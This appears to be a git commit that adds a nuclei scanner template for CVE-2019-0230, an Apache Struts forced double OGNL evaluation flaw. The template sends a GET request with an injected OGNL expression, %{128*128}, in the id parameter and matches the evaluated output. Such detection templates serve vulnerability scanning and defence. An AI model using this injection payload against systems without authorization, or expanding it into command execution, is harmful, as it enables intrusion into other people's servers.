Merge pull request #1106 from geeknik/patch-52

Create CVE-2019-0230.yaml
2021-03-19 13:46:43 +05:30 · 2021-03-19 13:46:43 +05:30 · 0e60153149
parent 43cfb05448 4a22b0225b
commit 0e60153149
1 changed files with 21 additions and 0 deletions
--- a/cves/2019/CVE-2019-0230.yaml
+++ b/cves/2019/CVE-2019-0230.yaml
@ -0,0 +1,21 @@
+id: CVE-2019-0230
+
+info:
+  name: Apache Struts RCE
+  author: geeknik
+  description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
+  reference:
+    - https://cwiki.apache.org/confluence/display/WW/S2-059
+    - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability
+  severity: high
+  tags: struts,rce,cve,cve2019
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?id=nuclei%25{128*128}"
+
+    matchers:
+      - type: word
+        words:
+          - "nuclei16384"